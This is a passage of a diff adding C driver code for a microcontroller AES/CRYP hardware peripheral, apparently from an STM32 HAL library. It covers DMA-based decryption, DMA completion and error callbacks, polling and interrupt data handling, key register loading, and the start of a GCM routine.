CRYP_CR_ALGOMODE, hcryp->Init.Algorithm); + +#endif /* End AES or CRYP */ + } + + else /*Algorithm CTR */ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + } + + /* Set IV */ + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + /* Set the Initialization Vector*/ +#if defined (AES) + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#else /* CRYP */ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#endif /* End AES or CRYP */ + } + } /* if (DoKeyIVConfig == 1U) */ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + if (hcryp->Size != 0U) + { + +#if defined (AES) + + /* Enable computation complete flag and error interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + +#else /* CRYP */ + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + +#endif /* End AES or CRYP */ + } + else + { + /* Process locked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + } + + /* Return function status */ + return HAL_OK; +} +/** + * @brief Decryption in ECB/CBC & CTR mode with AES Standard using DMA mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AES_Decrypt_DMA(CRYP_HandleTypeDef *hcryp) +{ + __IO uint32_t count = 0U; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + if (DoKeyIVConfig == 1U) + { + /* Key preparation for ECB/CBC */ + if (hcryp->Init.Algorithm != CRYP_AES_CTR) + { +#if defined (AES) + if (hcryp->AutoKeyDerivation == DISABLE)/*Mode 2 key preparation*/ + { + /* Set key preparation for decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for CCF flag to be raised */ + count = CRYP_TIMEOUT_KEYPREPARATION; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Return to decryption operating mode(Mode 3)*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + } + else /*Mode 4 : decryption & key preparation*/ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set decryption & Key preparation operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_KEYDERIVATION_DECRYPT); + } +#else /* CRYP */ + /* change ALGOMODE to key preparation for decryption*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_CR_ALGOMODE_AES_KEY); + + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Wait for BUSY flag to be raised */ + count = CRYP_TIMEOUT_KEYPREPARATION; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_SET(hcryp->Instance->SR, CRYP_FLAG_BUSY)); + + /* Turn back to ALGOMODE of the configuration */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, hcryp->Init.Algorithm); + +#endif /* End AES or CRYP */ + } + else /*Algorithm CTR */ + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + } + + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + /* Set the Initialization Vector*/ +#if defined (AES) + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#else /* CRYP */ + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3); +#endif /* End AES or CRYP */ + } + } /* if (DoKeyIVConfig == 1U) */ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + if (hcryp->Size != 0U) + { + /* Set the input and output addresses and start DMA transfer */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), (hcryp->Size / 4U), (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + } + + /* Return function status */ + return HAL_OK; +} + + +/** + * @brief DMA CRYP input data process complete callback. + * @param hdma: DMA handle + * @retval None + */ +static void CRYP_DMAInCplt(DMA_HandleTypeDef *hdma) +{ + CRYP_HandleTypeDef *hcryp = (CRYP_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Disable the DMA transfer for input FIFO request by resetting the DIEN bit + in the DMACR register */ +#if defined (CRYP) + hcryp->Instance->DMACR &= (uint32_t)(~CRYP_DMACR_DIEN); + +#else /* AES */ + CLEAR_BIT(hcryp->Instance->CR, AES_CR_DMAINEN); + + /* TinyAES2, No output on CCM AES, unlock should be done when input data process complete */ + if ((hcryp->Init.Algorithm & CRYP_AES_CCM) == CRYP_AES_CCM) + { + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Change the CRYP state to ready */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + } +#endif /* End AES or CRYP */ + + /* Call input data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA CRYP output data process complete callback. + * @param hdma: DMA handle + * @retval None + */ +static void CRYP_DMAOutCplt(DMA_HandleTypeDef *hdma) +{ + CRYP_HandleTypeDef *hcryp = (CRYP_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Disable the DMA transfer for output FIFO request by resetting + the DOEN bit in the DMACR register */ + +#if defined (CRYP) + + hcryp->Instance->DMACR &= (uint32_t)(~CRYP_DMACR_DOEN); + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + if ((hcryp->Init.Algorithm & CRYP_AES_GCM) != CRYP_AES_GCM) + { + /* Disable CRYP (not allowed in GCM)*/ + __HAL_CRYP_DISABLE(hcryp); + } + + #else /*NO GCM CCM */ + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + #endif /* GCM CCM defined*/ +#else /* AES */ + + CLEAR_BIT(hcryp->Instance->CR, AES_CR_DMAOUTEN); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + if ((hcryp->Init.Algorithm & CRYP_AES_GCM_GMAC) != CRYP_AES_GCM_GMAC) + { + /* Disable CRYP (not allowed in GCM)*/ + __HAL_CRYP_DISABLE(hcryp); + } +#endif /* End AES or CRYP */ + + /* Change the CRYP state to ready */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + /* Call output data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA CRYP communication error callback. + * @param hdma: DMA handle + * @retval None + */ +static void CRYP_DMAError(DMA_HandleTypeDef *hdma) +{ + CRYP_HandleTypeDef *hcryp = (CRYP_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* DMA error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_DMA; + +#if defined (AES) + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + +#endif /* AES */ + + /* Call error callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ +} + +/** + * @brief Set the DMA configuration and start the DMA transfer + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param inputaddr: address of the input buffer + * @param Size: size of the input buffer, must be a multiple of 16. + * @param outputaddr: address of the output buffer + * @retval None + */ +static void CRYP_SetDMAConfig(CRYP_HandleTypeDef *hcryp, uint32_t inputaddr, uint16_t Size, uint32_t outputaddr) +{ + /* Set the CRYP DMA transfer complete callback */ + hcryp->hdmain->XferCpltCallback = CRYP_DMAInCplt; + + /* Set the DMA input error callback */ + hcryp->hdmain->XferErrorCallback = CRYP_DMAError; + + /* Set the CRYP DMA transfer complete callback */ + hcryp->hdmaout->XferCpltCallback = CRYP_DMAOutCplt; + + /* Set the DMA output error callback */ + hcryp->hdmaout->XferErrorCallback = CRYP_DMAError; + +#if defined (CRYP) + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + + /* Enable the input DMA Stream */ + if (HAL_DMA_Start_IT(hcryp->hdmain, inputaddr, (uint32_t)&hcryp->Instance->DIN, Size) != HAL_OK) + { + /* DMA error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_DMA; + + /* Call error callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + /* Enable the output DMA Stream */ + if (HAL_DMA_Start_IT(hcryp->hdmaout, (uint32_t)&hcryp->Instance->DOUT, outputaddr, Size) != HAL_OK) + { + /* DMA error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_DMA; + + /* Call error callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + /* Enable In/Out DMA request */ + hcryp->Instance->DMACR = CRYP_DMACR_DOEN | CRYP_DMACR_DIEN; + +#else /* AES */ + + if (((hcryp->Init.Algorithm & CRYP_AES_GCM_GMAC) != CRYP_AES_GCM_GMAC) + && ((hcryp->Init.Algorithm & CRYP_AES_CCM) != CRYP_AES_CCM)) + { + /* Enable CRYP (not allowed in GCM & CCM)*/ + __HAL_CRYP_ENABLE(hcryp); + } + + /* Enable the DMA input stream */ + if (HAL_DMA_Start_IT(hcryp->hdmain, inputaddr, (uint32_t)&hcryp->Instance->DINR, Size) != HAL_OK) + { + /* DMA error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_DMA; + + /* Call error callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + /* Enable the DMA output stream */ + if (HAL_DMA_Start_IT(hcryp->hdmaout, (uint32_t)&hcryp->Instance->DOUTR, outputaddr, Size) != HAL_OK) + { + /* DMA error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_DMA; + + /* Call error callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + /*AES2v1.1.1 : CCM authentication : no init phase, only header and final phase */ + /* Enable In and Out DMA requests */ + if ((hcryp->Init.Algorithm & CRYP_AES_CCM) == CRYP_AES_CCM) + { + /* Enable only In DMA requests for CCM*/ + SET_BIT(hcryp->Instance->CR, (AES_CR_DMAINEN)); + } + else + { + /* Enable In and Out DMA requests */ + SET_BIT(hcryp->Instance->CR, (AES_CR_DMAINEN | AES_CR_DMAOUTEN)); + } +#endif /* End AES or CRYP */ +} + +/** + * @brief Process Data: Write Input data in polling mode and used in AES functions. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Timeout: Specify Timeout value + * @retval None + */ +static void CRYP_AES_ProcessData(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + + uint32_t temp[4]; /* Temporary CrypOutBuff */ + uint32_t i; +#if defined (CRYP) + uint16_t incount; /* Temporary CrypInCount Value */ + uint16_t outcount; /* Temporary CrypOutCount Value */ +#endif + +#if defined (CRYP) + + /*Temporary CrypOutCount Value*/ + incount = hcryp->CrypInCount; + + if (((hcryp->Instance->SR & CRYP_FLAG_IFNF) != 0x0U) && (incount < (hcryp->Size / 4U))) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + + /* Wait for OFNE flag to be raised */ + if (CRYP_WaitOnOFNEFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state & error code*/ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + if (((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) && (outcount < (hcryp->Size / 4U))) + { + /* Read the output block from the Output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer */ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + i = 0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + } + +#else /* AES */ + + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + + /* Wait for CCF flag to be raised */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Read the output block from the output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer*/ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUTR; + } + i = 0U; + while ((hcryp->CrypOutCount < ((hcryp->Size + 3U) / 4U)) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } +#endif /* End AES or CRYP */ +} + +/** + * @brief Handle CRYP block input/output data handling under interruption. + * @note The function is called under interruption only, once + * interruptions have been enabled by HAL_CRYP_Encrypt_IT or HAL_CRYP_Decrypt_IT. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @retval HAL status + */ +static void CRYP_AES_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t temp[4]; /* Temporary CrypOutBuff */ + uint32_t i; +#if defined (CRYP) + uint16_t incount; /* Temporary CrypInCount Value */ + uint16_t outcount; /* Temporary CrypOutCount Value */ +#endif + + if (hcryp->State == HAL_CRYP_STATE_BUSY) + { +#if defined (CRYP) + + /*Temporary CrypOutCount Value*/ + incount = hcryp->CrypInCount; + if (((hcryp->Instance->SR & CRYP_FLAG_IFNF) != 0x0U) && (incount < (hcryp->Size / 4U))) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + if (hcryp->CrypInCount == ((uint16_t)(hcryp->Size) / 4U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI); + + /* Call the input data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + if (((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) && (outcount < (hcryp->Size / 4U))) + { + /* Read the output block from the output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer */ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + i = 0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + if (hcryp->CrypOutCount == ((uint16_t)(hcryp->Size) / 4U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_OUTI); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Call Output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + +#else /*AES*/ + + /* Read the output block from the output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer*/ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUTR; + } + i = 0U; + while ((hcryp->CrypOutCount < ((hcryp->Size + 3U) / 4U)) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + + if (hcryp->CrypOutCount == (hcryp->Size / 4U)) + { + /* Disable Computation Complete flag and errors interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + + /* Call Output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + else + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + + if (hcryp->CrypInCount == (hcryp->Size / 4U)) + { + /* Call Input transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } +#endif /* End AES or CRYP */ + + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Writes Key in Key registers. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param KeySize: Size of Key + * @retval None + */ +static void CRYP_SetKey(CRYP_HandleTypeDef *hcryp, uint32_t KeySize) +{ +#if defined (CRYP) + + switch (KeySize) + { + case CRYP_KEYSIZE_256B: + hcryp->Instance->K0LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K0RR = *(uint32_t *)(hcryp->Init.pKey + 1); + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 5); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 6); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 7); + break; + case CRYP_KEYSIZE_192B: + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + break; + case CRYP_KEYSIZE_128B: + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 1); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 3); + + break; + default: + break; + } +#else /*AES*/ + switch (KeySize) + { + case CRYP_KEYSIZE_256B: + hcryp->Instance->KEYR7 = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->KEYR6 = *(uint32_t *)(hcryp->Init.pKey + 1); + hcryp->Instance->KEYR5 = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->KEYR4 = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->KEYR3 = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->KEYR2 = *(uint32_t *)(hcryp->Init.pKey + 5); + hcryp->Instance->KEYR1 = *(uint32_t *)(hcryp->Init.pKey + 6); + hcryp->Instance->KEYR0 = *(uint32_t *)(hcryp->Init.pKey + 7); + break; + case CRYP_KEYSIZE_128B: + hcryp->Instance->KEYR3 = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->KEYR2 = *(uint32_t *)(hcryp->Init.pKey + 1); + hcryp->Instance->KEYR1 = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->KEYR0 = *(uint32_t *)(hcryp->Init.pKey + 3); + + break; + default: + break; + } +#endif /* End AES or CRYP */ +} + +#if defined (CRYP_CR_ALGOMODE_AES_GCM)|| defined (AES) +/** + * @brief Encryption/Decryption process in AES GCM mode and prepare the authentication TAG + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Timeout: Timeout duration + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESGCM_Process(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + uint32_t wordsize = (uint32_t)(hcryp->Size) / 4U ; + uint16_t outcount; /* Temporary CrypOutCount Value */ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; 